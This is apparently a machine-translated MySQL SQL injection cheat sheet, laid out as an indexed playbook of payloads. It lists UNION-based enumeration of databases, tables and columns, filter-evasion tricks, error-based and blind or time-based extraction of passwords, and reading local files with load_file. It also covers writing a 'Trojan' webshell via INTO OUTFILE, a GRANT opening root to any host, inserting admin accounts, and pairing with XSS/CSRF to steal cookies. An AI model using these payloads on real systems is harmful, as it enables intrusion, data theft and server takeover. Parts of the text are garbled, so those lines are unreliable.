SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘
1, id=1 ' or 1=1--this can query all the information, where "--" represents a comment, the content behind it will be the comment content, note :--there will be a space behind
The comment characters are also: # and/*
Directory:
0x00 MySQL General injection (SELECT)
0x01 MySQL General injection (INSERT, UPDATE)
0x02 MySQL Error injection
0x03 MySQL General Blinds
0x04 MySQL Time blind
0x05 MySQL Other injection tips
0x06 MySQL Database version features
Body:
0x00 MySQL General injection (SELECT)
1. Annotation characters
#
/*
--
2. Filter Space Injection
Use/**/or () or + instead of spaces
%0c = form feed, new page
%09 = Horizontal Tab
%0d = carriage return
%0a = line feeds, new line
3. More than one data display
Concat ()
Group_concat ()
Concat_ws ()
4. Related functions
System_user () system user name
User () Username
Current_User Current user Name
Session_user () User name of the connection database
Database () name
Version () MySQL database versions
Load_file () mysql read local file function
@ @datadir Read database path
@ @basedir MYSQL Installation path
@ @version_compile_os Operating system Windows Server 2003
GRANT all privileges on * * to ' root ' @ '% ' identified by ' 123456 ' with GRANT OPTION;
5.mysql General Injection Statement
Guess number of fields
ORDER BY n/*
View MySQL basic information
and 1=2 Union Select 1,2,3,CONCAT_WS (char (32,58,32), 0x7c,user (), Database (), version ()), 5,6,7/*
Querying the database
and 1=2 Union select 1,schema_name,3,4 from Information_schema.schemata limit 1,1/*
and 1=2 Union Select 1,group_concat (schema_name), 3,4 from information_schema.schemata/*
Query table name
and 1=2 Union select 1,2,3,4,table_name,5 from Information_schema.tables where table_schema= database 16 encoding limit 1,1/*
and 1=2 Union SELECT 1,2,3,4,GROUP_CONCAT (TABLE_NAME), 5 from Information_schema.tables where table_schema= database 16 encoding/*
Query fields
and 1=2 Union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name= table name hexadecimal encoding and Table_ Schema= database 16-Encoding limit 1,1/*
and 1=2 Union Select 1,2,3,4,group_concat (column_name), 5,6,7 from Information_schema.columns where table_name= The hexadecimal encoding of the table name and the 16 encoding of the database table_schema=/*
Querying data
and 1=2 Union Select, Field 1, 5, field 2,7,8 from database. Table/*
Determine if you have read and write permissions
and (select COUNT (*) from Mysql.user) >0/*
and (select COUNT (File_priv) from Mysql.user) >0/*
6.mysql Read Write file
Required Conditions:
READ: File permission Prerequisites
Write: 1. Absolute path 2.union use 3. You can use the '
-------------------------Read----------------------
mysql3.x Read method
Create Table A (cmd text);
Load data infile ' c:\\xxx\\xxx\\xxx.txt ' into table A;
SELECT * from A;
mysql4.x Read method
In addition to the above method can also use Load_file ()
Create Table A (cmd text);
Insert into a (CMD) VALUES (load_file (' c:\\ddd\\ddd\\ddd.txt '));
SELECT * from A;
mysql5.x Read method
Both of the above can be
Tips for reading files:
Load_file (char (32,26,56,66))
Load_file (0x633a5c626f6f742e696e69)
------------Write--------------------------
into outfile writing files
Union Select 1,2,3,char (where you write a Trojan code converted into 10 binary or 16 binary), 5,6,7,8,9,10,7 into outfile ' d:\web\90team.php '/*
Union Select 1,2,3,load_file (' d:\web\logo123.jpg '), 5,6,7,8,9,10,7 into outfile ' d:\web\90team.php '/*
0x01 MySQL General injection (INSERT, UPDATE)
MySQL General request mysql_query does not support multi-statement execution, MYSQLI can.
Insert injection multiple use error injection!
1. If you can directly insert the administrator can use directly!
Insert into User (Username,password) VALUES (' xxxx ', ' xxxx '), (' dddd ', ' dddd ')/* ');
2. If you can insert some data, the data will be displayed on the Web page, we can combine XXS and csrf to obtain cookies or Getshell
Update injection Ibid.
0x02 MySQL Error injection
1. and (select 1 from (SELECT COUNT (*), concat (SELECT (statement)) from Information_schema.tables limit 0,1), floor (rand (0 ) x from Information_schema.tables Group by X) a) and 1=1
The statement is filled in a general sentence, such as: SELECT distinct concat (0x7e,0x27,schema_name,0x27,0x7e) from Information_schema.schemata LIMIT 0,1
2. and+1= (select+*+from+ (select+name_const (statement), 1), Name_const ((statement), 1))--
3.update web_ids set host= ' www.0x50sec.org ' where ID =1 and (select 1 from (SELECT COUNT (*), concat (rand (0), (subst Ring ((Select (statement)), 1,62))))) (A from Information_schema.tables group by a) b);
4.insert into Web_ids (host) VALUES ((select (1) from Mysql.user where 1=1 and (select 1 from (SELECT COUNT (*), concat ( RAND (0) * *), (substring ((Select (statement)), 1,62))) (A from Information_schema.tables group by a) b)));
0x03 MySQL General Blinds
Using ASCII
and ASCII (substring ((SELECT password from users where id=1), 1, 1) =49
Using regular expressions
and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a-n] ' LIMIT 0,1)
0x04 MySQL Time blind
1170 Union Select if (substring (current,1,1) =char (one), Benchmark (5000000,encode (' msg ', ' by 5 seconds '), null) from ( Select Database () as current) as TBL
UNION SELECT IF (SUBSTRING (password,1,1) = ' A ', BENCHMARK (100000,SHA1 (1)), 0) User,password from mysql.user WHERE User = ' Root
0x05 MySQL Other injection tips
Later met the update
0x06 MySQL Database version features
1. mysql5.0 After the Information.schema library appears
2. mysql5.1 after the UDF is imported into the xx\lib\plugin\ directory
3.mysql5.x after the system executes the command
MySQL Injection summary